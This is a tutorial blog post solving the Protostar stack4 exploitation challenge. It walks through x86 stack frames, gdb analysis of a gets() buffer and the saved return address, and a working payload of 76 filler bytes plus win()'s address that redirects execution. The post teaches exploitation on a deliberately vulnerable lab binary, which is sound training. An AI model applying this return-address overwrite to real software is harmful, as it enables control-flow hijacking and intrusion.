Practical Reverse Engineering Tutorials Part 2: Protostar Stack4
About the challenge
In this article, we’ll go through the Protostar stack4 challenge. It is somewhat similar to the stack0 challenge that we tackled earlier, but it introduces an interesting idea: instead of just modifying data, we will redirect execution to alternate code.
Prerequisite: Make sure you’ve completed Part 1 of the Practical Reverse Engineering Tutorials series. It’d also be great if you try the stack1-stack3 challenges on your own, as they are similar to stack0.
Recon
Assuming you’ve done the setup described in Part 1 of this series, we jump straight into running the challenge to see what we are up against.
user@protostar:/opt/protostar/bin$ ./stack4
ABCD
user@protostar:/opt/protostar/bin$
So, the program waits for user input. When we enter ‘ABCD’, nothing happens. That’s a bummer. We need some static analysis to map out our next steps. Looking at the challenge’s source code might be easier (and it wouldn’t give much away), but we’ll still avoid the source code as much as possible to give our brains more exercise.
Static Analysis
We first run our staple strings command on the program to list interesting text data.
user@protostar:/opt/protostar/bin$ strings stack4
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
gets
puts
__libc_start_main
GLIBC_2.0
PTRh
[^_]
code flow successfully changed
user@protostar:/opt/protostar/bin$
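Conceptually, strings just scans the file for runs of printable characters (at least 4 by default). Below is a rough Python approximation, assuming plain 7-bit ASCII and ignoring the tool’s other options; find_strings is an illustrative name, not part of any library.

```python
import re


def find_strings(data, min_len=4):
    """Return runs of at least min_len printable ASCII bytes (plus tab) as str.

    A rough approximation of `strings`; other encodings and per-section
    scanning are not modelled.
    """
    # Printable ASCII is 0x20 (space) to 0x7e (~); strings also accepts tab.
    pattern = re.compile(rb"[\t\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]
```

Because it scans the whole file, find_strings(open("stack4", "rb").read()) behaves roughly like strings -a, which also reports text from non-loaded sections such as debug info, so expect more output than shown above.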
We straight away see a potentially useful string: code flow successfully changed. I’d wager a guess that we have to get our currently dumb program to print this string somehow. Let’s find out under what condition it gets printed. So we bring out gdb like last time and check the disassembly of the main function.
user@protostar:/opt/protostar/bin$ gdb stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048408 <main+0>: push ebp
0x08048409 <main+1>: mov ebp,esp
0x0804840b <main+3>: and esp,0xfffffff0
0x0804840e <main+6>: sub esp,0x50
0x08048411 <main+9>: lea eax,[esp+0x10]
0x08048415 <main+13>: mov DWORD PTR [esp],eax
0x08048418 <main+16>: call 0x804830c <gets@plt>
0x0804841d <main+21>: leave
0x0804841e <main+22>: ret
End of assembler dump.
(gdb)
That’s interesting. main cannot print the string we’re after, because there is no print/puts call in it. main makes only one function call, to gets, to read user input, and no other function is called at all. This means the string is printed from somewhere else, and our challenge is to get that code executed. We know from the previous challenge we solved that to print this string, the program must pass a pointer to it as a parameter to an output function (like puts). So to find where this string is printed from, we first have to find the address where the string is located and then search for references to that address.
You may know that an executable file is divided into various sections. Generally, the executable code is part of a section called .text, and literal strings are part of a section called .rodata. So, our technique here would be to:
- Get the section addresses (using the maintenance info sections gdb command)
- Search for the string’s address in the .rodata section (using the find <section_start_address>, <section_end_address>, <string> gdb command)
- Search for a reference to the string’s address in the .text section (using the find <section_start_address>, <section_end_address>, <string_address> gdb command)
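Both searches boil down to plain byte searches. The following Python sketch mimics the two gdb find commands on hand-built stand-ins for the section contents: the .rodata bytes are a placeholder prefix plus the string, and win’s machine code is re-assembled by hand from its disassembly (shown further below), so neither is dumped from the real binary. The helper find_all is hypothetical, not a gdb API.

```python
import struct

RODATA_BASE = 0x80484D8  # .rodata start, from `maintenance info sections`
WIN_ADDR = 0x80483F4     # first byte of win(), from `disassemble win`

# Assumption: the first 8 bytes of .rodata are placeholders, not dumped from
# the binary; the string itself matches the strings/gdb output.
rodata = b"\x03\x00\x00\x00\x01\x00\x02\x00" + b"code flow successfully changed\x00"

# win() re-assembled by hand from its disassembly: push ebp | mov ebp,esp |
# sub esp,0x18 | mov DWORD PTR [esp],0x80484e0 | call puts | leave | ret
win_code = bytes.fromhex("55" "89e5" "83ec18" "c70424e0840408" "e826ffffff" "c9" "c3")


def find_all(haystack, needle, base):
    """Return the address of every occurrence of needle in a region starting at base."""
    hits = []
    idx = haystack.find(needle)
    while idx != -1:
        hits.append(base + idx)
        idx = haystack.find(needle, idx + 1)
    return hits


# Search 1: where does the string live? (like `find` with a string pattern)
string_addrs = find_all(rodata, b"code flow successfully changed", RODATA_BASE)

# Search 2: which code contains that address as a 4-byte little-endian operand?
xrefs = find_all(win_code, struct.pack("<I", string_addrs[0]), WIN_ADDR)

print([hex(a) for a in string_addrs])  # ['0x80484e0']
print([hex(a) for a in xrefs])         # ['0x80483fd'], i.e. win+9
```

The hit lands at win+9 rather than at an instruction boundary because the address is the immediate operand at the end of the 7-byte mov instruction that starts at win+6.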
This is shown below:
(gdb) maintenance info sections
Exec file:
`/opt/protostar/bin/stack4', file type elf32-i386.
0x8048114->0x8048127 at 0x00000114: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048128->0x8048148 at 0x00000128: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048148->0x804816c at 0x00000148: .note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS
0x804816c->0x8048198 at 0x0000016c: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048198->0x80481b8 at 0x00000198: .gnu.hash ALLOC LOAD READONLY DATA HAS_CONTENTS
0x80481b8->0x8048218 at 0x000001b8: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048218->0x8048267 at 0x00000218: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048268->0x8048274 at 0x00000268: .gnu.version ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048274->0x8048294 at 0x00000274: .gnu.version_r ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048294->0x804829c at 0x00000294: .rel.dyn ALLOC LOAD READONLY DATA HAS_CONTENTS
0x804829c->0x80482bc at 0x0000029c: .rel.plt ALLOC LOAD READONLY DATA HAS_CONTENTS
0x80482bc->0x80482ec at 0x000002bc: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
0x80482ec->0x804833c at 0x000002ec: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
0x8048340->0x80484bc at 0x00000340: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
0x80484bc->0x80484d8 at 0x000004bc: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
0x80484d8->0x80484ff at 0x000004d8: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048500->0x8048504 at 0x00000500: .eh_frame ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8049504->0x804950c at 0x00000504: .ctors ALLOC LOAD DATA HAS_CONTENTS
0x804950c->0x8049514 at 0x0000050c: .dtors ALLOC LOAD DATA HAS_CONTENTS
0x8049514->0x8049518 at 0x00000514: .jcr ALLOC LOAD DATA HAS_CONTENTS
0x8049518->0x80495e8 at 0x00000518: .dynamic ALLOC LOAD DATA HAS_CONTENTS
0x80495e8->0x80495ec at 0x000005e8: .got ALLOC LOAD DATA HAS_CONTENTS
0x80495ec->0x8049608 at 0x000005ec: .got.plt ALLOC LOAD DATA HAS_CONTENTS
0x8049608->0x8049610 at 0x00000608: .data ALLOC LOAD DATA HAS_CONTENTS
0x8049610->0x8049618 at 0x00000610: .bss ALLOC
0x0000->0x0ad4 at 0x00000610: .stab READONLY HAS_CONTENTS
0x0000->0x3bd2 at 0x000010e4: .stabstr READONLY HAS_CONTENTS
0x0000->0x0039 at 0x00004cb6: .comment READONLY HAS_CONTENTS
(gdb) find 0x80484d8,0x80484ff,"code flow successfully changed"
0x80484e0
1 pattern found.
(gdb) x/s 0x80484e0
0x80484e0: "code flow successfully changed"
(gdb) find 0x8048340, 0x80484bc, 0x80484e0
0x80483fd <win+9>
1 pattern found.
(gdb) x/3i 0x80483fd
0x80483fd <win+9>: loopne 0x8048383 <__do_global_dtors_aux+19>
0x80483ff <win+11>: add al,0x8
0x8048401 <win+13>: call 0x804832c <puts@plt>
(gdb)
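Thus we figure out that the string is used inside a function called win, as gdb shows. (The x/3i output looks like garbage because 0x80483fd is not the start of an instruction: it points into the middle of the mov DWORD PTR [esp],0x80484e0 instruction at win+6, whose last four bytes, e0 84 04 08, are the string’s address in little-endian order.) We can confirm this by disassembling win, which also gives us the address that we need to direct our code execution to.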
(gdb) disassemble win
Dump of assembler code for function win:
0x080483f4 <win+0>: push ebp
0x080483f5 <win+1>: mov ebp,esp
0x080483f7 <win+3>: sub esp,0x18
0x080483fa <win+6>: mov DWORD PTR [esp],0x80484e0
0x08048401 <win+13>: call 0x804832c <puts@plt>
0x08048406 <win+18>: leave
0x08048407 <win+19>: ret
End of assembler dump.
(gdb)
So, we need to make our program start executing at 0x80483f4 (the entry point of function win) somehow.
A primer on x86 stack frames
Before continuing further, we need to learn a bit about how program control flows through stack frames. A stack frame is a region of the stack that belongs to a single function call and represents its execution environment. If the same function is called many times, each call gets its own stack frame on the stack. A stack frame typically consists of:
- Parameters passed to the function
- Return address (Code location to jump to after the function is complete)
- Pointer to the previous (Calling function’s) stack frame’s base
- Local variables
Let’s see with the help of a small example how this works.
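Sample Code
int foo(int a)
{
    int x = 2;      /* local variable */
    int y = 3;      /* unused, but still gets stack space */
    x = a + x;
    return x;
}
int main()
{
    int a = 0;
    int b = 1;      /* unused */
    foo(a);         /* return value is ignored */
}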
Compiled for 32-bit x86 without optimization, this produces assembly code like the following (Intel syntax):
foo:
push ebp
mov ebp,esp
sub esp,0x10
mov DWORD PTR [ebp-0x8],0x2
mov DWORD PTR [ebp-0x4],0x3
mov eax,DWORD PTR [ebp+0x8]
add DWORD PTR [ebp-0x8],eax
mov eax,DWORD PTR [ebp-0x8]
leave
ret
main:
push ebp
mov ebp,esp
sub esp,0x14
mov DWORD PTR [ebp-0x8],0x0
mov DWORD PTR [ebp-0x4],0x1
mov eax,DWORD PTR [ebp-0x8]
mov DWORD PTR [esp],eax
call 0x80483ed <foo>
leave
ret
Stack frame
Important registers
The x86 registers that one would be most interested in while understanding stack frames are:
- esp: Stack Pointer. Points to (Holds address of) the current top of the stack
- ebp: Base Pointer. Points to (Holds address of) the base of the current stack frame
- eip: Instruction Pointer. Points to (Holds address of) the next instruction to be executed in the program
Calling Convention / Function Parameters
In the usual 32-bit x86 (cdecl) calling convention, the parameters being passed to a function are placed on the stack before calling it, and the call instruction itself then pushes the return address. This can be seen in the instructions below.
mov DWORD PTR [esp],eax
call 0x80483ed <foo>
Here, the mov instruction places the parameter (the value of a, i.e. 0, which was just loaded into eax) at the top of the stack. Strictly speaking this is not a push: main already reserved the space with sub esp,0x14, so the mov writes into it without changing esp.
The call instruction is equivalent to pushing the address of the instruction that follows it onto the stack and then jumping to the called function’s address. This pushed value, the return address, is where execution continues after the called function returns.
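To make the call semantics concrete, here is a small Python model, assuming the common 5-byte call rel32 form (opcode E8 followed by a 32-bit offset). It uses stack4’s own call to gets at 0x08048418 from the main disassembly and shows that the pushed return address is simply the next instruction, main+21. The name call_rel32 is illustrative only.

```python
CALL_REL32_LEN = 5  # assumption: `call rel32` = opcode E8 + 4-byte offset


def call_rel32(call_addr, target, stack):
    """Model `call target`: push the return address, then jump to target.

    The Python list stands in for the stack; append() plays the role of push.
    """
    return_addr = call_addr + CALL_REL32_LEN  # address of the next instruction
    stack.append(return_addr)
    return target  # the new eip


# stack4's `call 0x804830c <gets@plt>` at main+16 (0x08048418)
stack = []
eip = call_rel32(0x08048418, 0x0804830C, stack)
print(hex(eip), hex(stack[-1]))  # 0x804830c 0x804841d (main+21, the `leave`)
```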
Function Prologue / Entry Sequence
At the very beginning of a function, the first thing done is to save the calling function’s base pointer (ebp) on the stack and then set ebp to the current top of the stack (esp), which becomes the base of the new frame. This can be seen in these instructions:
foo:
push ebp
mov ebp,esp
Local Variables
Then, space is created on the stack for holding any local variables.
sub esp,0x10
Exit Sequence
Finally, after the function has executed, it returns by discarding its local variables, restoring the calling function’s base pointer, and then popping the next value (the return address) from the stack into eip.
leave
ret
Here, leave is equivalent to mov esp,ebp followed by pop ebp: it releases the local variables and restores the caller’s ebp. ret is equivalent to pop eip (not a real instruction, but a useful mental model), so execution continues at the instruction right after the original call.
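The prologue and exit sequence can be checked with a tiny Python model of a downward-growing stack. The Cpu class and the addresses in the demo are hypothetical; the point is only that leave (mov esp,ebp; pop ebp) followed by ret hands back exactly the caller’s ebp, esp and return address.

```python
class Cpu:
    """Tiny model of 32-bit x86 stack handling (stack grows to lower addresses)."""

    def __init__(self, esp, ebp):
        self.esp, self.ebp, self.eip = esp, ebp, None
        self.mem = {}  # address -> 32-bit word

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def leave(self):
        self.esp = self.ebp    # mov esp, ebp: discard the locals
        self.ebp = self.pop()  # pop ebp: restore the caller's base pointer

    def ret(self):
        self.eip = self.pop()  # "pop eip": jump to the saved return address


cpu = Cpu(esp=0x1000, ebp=0x2000)  # hypothetical caller state
cpu.push(0x400123)                 # call pushes a (made-up) return address
cpu.push(cpu.ebp)                  # prologue: push ebp
cpu.ebp = cpu.esp                  #           mov ebp, esp
cpu.esp -= 0x10                    #           sub esp, 0x10 (locals)
cpu.leave()
cpu.ret()
print(hex(cpu.eip), hex(cpu.ebp), hex(cpu.esp))  # 0x400123 0x2000 0x1000
```

Whatever word sits just above the saved ebp becomes the new eip, which is exactly what the rest of this article exploits.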
What we need to do
From the above analysis of the stack frame, we now know that:
- Program flow is controlled through the eip register
- On returning from a called function, the eip register is loaded with a value (the return address) from the stack
- If we can somehow overflow a local variable on the stack and accurately overwrite the return address, we can control program execution.
- Note that, just like the function foo, the function main has its own stack frame and returns to “something” after completing its execution. This “something” is the C library runtime that the program was linked against (in glibc, __libc_start_main is what calls main). So we can change the execution path by overwriting main’s return address as well.
Gotchas
In some explanations, main’s stack frame (marked esp_main / StackFrame_main in the figure above) is drawn to also include the parameter being passed to foo. I’ve excluded it here to avoid the confusion of overlapping stack frames.
Dynamic Analysis
Armed with our static analysis so far, we start the dynamic analysis, so fire up gdb. We know that the code of main looks like this:
0x08048408 <main+0>: push ebp
0x08048409 <main+1>: mov ebp,esp
0x0804840b <main+3>: and esp,0xfffffff0
0x0804840e <main+6>: sub esp,0x50
0x08048411 <main+9>: lea eax,[esp+0x10]
0x08048415 <main+13>: mov DWORD PTR [esp],eax
0x08048418 <main+16>: call 0x804830c <gets@plt>
0x0804841d <main+21>: leave
0x0804841e <main+22>: ret
End of assembler dump.
We set breakpoints at a few locations, as below:
(gdb) b *0x08048408
Breakpoint 1 at 0x8048408: file stack4/stack4.c, line 12.
(gdb) b *0x08048411
Breakpoint 2 at 0x8048411: file stack4/stack4.c, line 15.
(gdb) b *0x08048418
Breakpoint 3 at 0x8048418: file stack4/stack4.c, line 15.
(gdb) b *0x0804841d
Breakpoint 4 at 0x804841d: file stack4/stack4.c, line 16.
(gdb) b *0x0804841e
Breakpoint 5 at 0x804841e: file stack4/stack4.c, line 16.
Now, we run the program until the first couple of breakpoints and analyze the registers and the stack.
(gdb) r
Starting program: /opt/protostar/bin/stack4
Breakpoint 1, main (argc=1, argv=0xbffff864) at stack4/stack4.c:12
12 stack4/stack4.c: No such file or directory.
in stack4/stack4.c
(gdb) info r
eax 0xbffff864 -1073743772
ecx 0xb0a7a13f -1331191489
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7bc 0xbffff7bc
ebp 0xbffff838 0xbffff838
esi 0x0 0
edi 0x0 0
eip 0x8048408 0x8048408 <main>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) c
Continuing.
Breakpoint 2, main (argc=1, argv=0xbffff864) at stack4/stack4.c:15
15 in stack4/stack4.c
(gdb) info r
eax 0xbffff864 -1073743772
ecx 0xb0a7a13f -1331191489
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff760 0xbffff760
ebp 0xbffff7b8 0xbffff7b8
esi 0x0 0
edi 0x0 0
eip 0x8048411 0x8048411 <main+9>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/24x $esp
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x080495ec 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x080495ec 0xbffff7b8 0x08048449
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048430 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804843b 0xb7fd7ff4
0xbffff7b0: 0x08048430 0x00000000 0xbffff838 0xb7eadc76
(gdb) x/4x $ebp
0xbffff7b8: 0xbffff838 0xb7eadc76 0x00000001 0xbffff864
(gdb)
We can see that the C runtime (or whatever called main; we don’t need to dig into what that is) had its base pointer (ebp) at 0xbffff838, and this value is preserved at 0xbffff7b8. Then, main makes the current stack pointer (esp) its new ebp. After that, main rounds esp down to a 16-byte boundary, which wastes 8 bytes here, and then reserves a further 0x50 (80) bytes for its stack. After all these operations, the salient characteristics of main’s stack frame are as below:
- Current stack top (esp) is 0xbffff760
- Current base pointer (ebp) is 0xbffff7b8
- The ebp of main’s caller is 0xbffff838, preserved at 0xbffff7b8
- main’s return address into its caller is saved one word above the saved ebp, because the caller’s call instruction pushed it just before main pushed ebp. Thus the return address is 0xb7eadc76, as we can see at location 0xbffff7bc (ebp + 0x4 = 0xbffff7b8 + 0x4). This location, 0xbffff7bc, is the one we want to overwrite with the address of the win function, so that main returns into win instead of into its caller.
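The numbers in this list can be reproduced by replaying main’s prologue on the register values from Breakpoint 1. This is a plain arithmetic sketch in Python, not gdb output.

```python
# Register value at Breakpoint 1, i.e. before main's `push ebp`.
esp = 0xBFFFF7BC  # points at main's return address (0xb7eadc76)

esp -= 4                     # push ebp: caller's ebp (0xbffff838) saved here
saved_ebp_slot = esp
ebp = esp                    # mov ebp, esp
esp &= 0xFFFFFFF0            # and esp, 0xfffffff0: round down to 16 bytes
alignment_waste = ebp - esp  # bytes skipped by the alignment
esp -= 0x50                  # sub esp, 0x50
return_addr_slot = ebp + 4   # return address sits just above the saved ebp

print(hex(saved_ebp_slot), hex(ebp), hex(esp), alignment_waste, hex(return_addr_slot))
# 0xbffff7b8 0xbffff7b8 0xbffff760 8 0xbffff7bc
```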
Now, run till the next breakpoint.
(gdb) c
Continuing.
Breakpoint 3, 0x08048418 in main (argc=1, argv=0xbffff864)
at stack4/stack4.c:15
15 in stack4/stack4.c
(gdb) x $esp
0xbffff760: 0xbffff770
(gdb)
So we see that the buffer in which gets will store the input string is located at 0xbffff770 (the argument to gets is the buffer address, and it is passed at the top of the stack, as we know from the previous section). We can see how far this is from the address we want to overwrite by subtracting:
0xbffff7bc - 0xbffff770 = 0x4C (or 76 bytes)
So the return address sits 76 bytes past the start of the input buffer: if we input 80 bytes, bytes 77-80 will overwrite the return address. We could go for the win (pun intended) already, but let’s continue to the rest of our breakpoints to confirm our theory.
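The same subtraction, extended to the saved ebp slot, tells us which input bytes land where. A short Python sketch using the addresses observed in gdb:

```python
buffer_addr = 0xBFFFF770       # gets() argument, read with `x $esp` at Breakpoint 3
saved_ebp_slot = 0xBFFFF7B8    # main's ebp: the caller's ebp is saved here
return_addr_slot = 0xBFFFF7BC  # ebp + 4: main's return address

ebp_offset = saved_ebp_slot - buffer_addr    # input bytes 73-76 hit the saved ebp
ret_offset = return_addr_slot - buffer_addr  # input bytes 77-80 hit the return address
payload_len = ret_offset + 4                 # filler plus a 4-byte address

print(ebp_offset, ret_offset, payload_len)  # 72 76 80
```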
(gdb) c
Continuing.
12345678901234567890123456789012345678901234567890123456789012345678901234567890
Breakpoint 4, main (argc=0, argv=0xbffff864) at stack4/stack4.c:16
16 in stack4/stack4.c
(gdb) x/24x $esp
0xbffff760: 0xbffff770 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0x34333231 0x38373635 0x32313039 0x36353433
0xbffff780: 0x30393837 0x34333231 0x38373635 0x32313039
0xbffff790: 0x36353433 0x30393837 0x34333231 0x38373635
0xbffff7a0: 0x32313039 0x36353433 0x30393837 0x34333231
0xbffff7b0: 0x38373635 0x32313039 0x36353433 0x30393837
(gdb) info r $ebp
ebp 0xbffff7b8 0xbffff7b8
(gdb) c
Continuing.
Breakpoint 5, 0x0804841e in main (argc=Cannot access memory at address 0x3635343b
) at stack4/stack4.c:16
16 in stack4/stack4.c
(gdb) info r $ebp
ebp 0x36353433 0x36353433
(gdb)
We continue, enter an 80-byte pattern, and can see the repeated pattern on the stack: the last 4 bytes, 7890 (0x30393837 as a little-endian word), have overwritten the return address at 0xbffff7bc. We also see that if we stop after the leave instruction, the value 0x36353433 (3456) from address 0xbffff7b8 has been popped into ebp. The argc=0 in the Breakpoint 4 output is a side effect as well: gets appends a terminating NUL byte, which lands on the lowest byte of argc at 0xbffff7c0.
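To double-check this reading of the stack dump, the following Python sketch replays the overflow on a model of the stack: the 72 bytes between the buffer start and the saved ebp, followed by the four words printed by x/4x $ebp, then an unbounded copy of the 80-byte pattern plus the NUL terminator that gets appends. The gets_like_copy helper is a hypothetical stand-in for gets, not libc code.

```python
import struct

BUF = 0xBFFFF770        # start of the gets() buffer
SAVED_EBP = 0xBFFFF7B8  # main's ebp

# The four words printed by `x/4x $ebp` before the overflow:
# saved ebp, return address, argc, argv.
frame_top = struct.pack("<4I", 0xBFFFF838, 0xB7EADC76, 0x00000001, 0xBFFFF864)

# Model memory from BUF upwards: 72 bytes of buffer and padding, then the words above.
memory = bytearray(SAVED_EBP - BUF) + bytearray(frame_top)


def gets_like_copy(mem, data):
    """Hypothetical stand-in for gets(): copy data plus a NUL, no bounds check."""
    mem[: len(data) + 1] = data + b"\x00"


def word_at(addr):
    """Read the 32-bit little-endian word stored at a stack address."""
    return struct.unpack_from("<I", memory, addr - BUF)[0]


gets_like_copy(memory, b"1234567890" * 8)  # the 80-byte input typed in gdb

print(hex(word_at(0xBFFFF7B8)))  # saved ebp      -> 0x36353433 ("3456")
print(hex(word_at(0xBFFFF7BC)))  # return address -> 0x30393837 ("7890")
print(word_at(0xBFFFF7C0))       # argc           -> 0 (low byte hit by the NUL)
```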
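Now, we find the address of the win function and use it as the last 4 bytes of an 80-byte input to crack the program. Since x86 is little-endian, the address 0x080483f4 has to be supplied as the bytes \xf4\x83\x04\x08. (The one-liner below uses Python 2 syntax, which works on the Protostar VM.)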
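The python -c one-liner used in the session below relies on Python 2, where print writes str objects as raw bytes. Under Python 3 it is a syntax error, and even a print() version would encode characters like \xf4 as text (typically two UTF-8 bytes), corrupting the address. A minimal Python 3 sketch that builds the same payload as raw bytes, assuming the win address 0x080483f4 found with disassemble win earlier:

```python
import struct
import sys

WIN_ADDR = 0x080483F4  # entry point of win(), from `disassemble win`
OFFSET = 76            # gets() buffer -> saved return address, measured in gdb

# 76 filler bytes, then win's address as a 32-bit little-endian value
# (b"\xf4\x83\x04\x08"). The trailing newline ends gets()'s read.
payload = b"A" * OFFSET + struct.pack("<I", WIN_ADDR) + b"\n"

if __name__ == "__main__":
    # Write raw bytes; print() would encode them as text first.
    sys.stdout.buffer.write(payload)
```

Saved as a file (exploit.py is just an example name), it would be used as python3 exploit.py | ./stack4 on a system that has Python 3.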
(gdb) x win
0x80483f4 <win>: 0x83e58955
(gdb) quit
user@protostar:/opt/protostar/bin$ python -c 'print "A"*76+"\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault
user@protostar:/opt/protostar/bin$
The program prints our target string, so the challenge is solved. The segmentation fault that follows is expected: win was entered through main’s ret rather than through a call, so no valid return address was pushed for it (and ebp is left holding our 0x41414141 filler). When win itself returns, it pops whatever happens to lie next on the stack and jumps there.
References / Lessons Learnt
In this article, we learnt:
- Getting information about the different sections of a program in gdb
- Searching for values in a section of the program with gdb
- Extending our knowledge of stack/buffer overflows to hijack program execution by overwriting a saved return address (the basic building block of return-to-libc and Return Oriented Programming (ROP) attacks)
- About stack frames and the esp/ebp/eip registers
You can refer to the links below to read more about some of the things discussed above. If you have any queries or suggestions, please leave a comment here or ping me @shantanugoel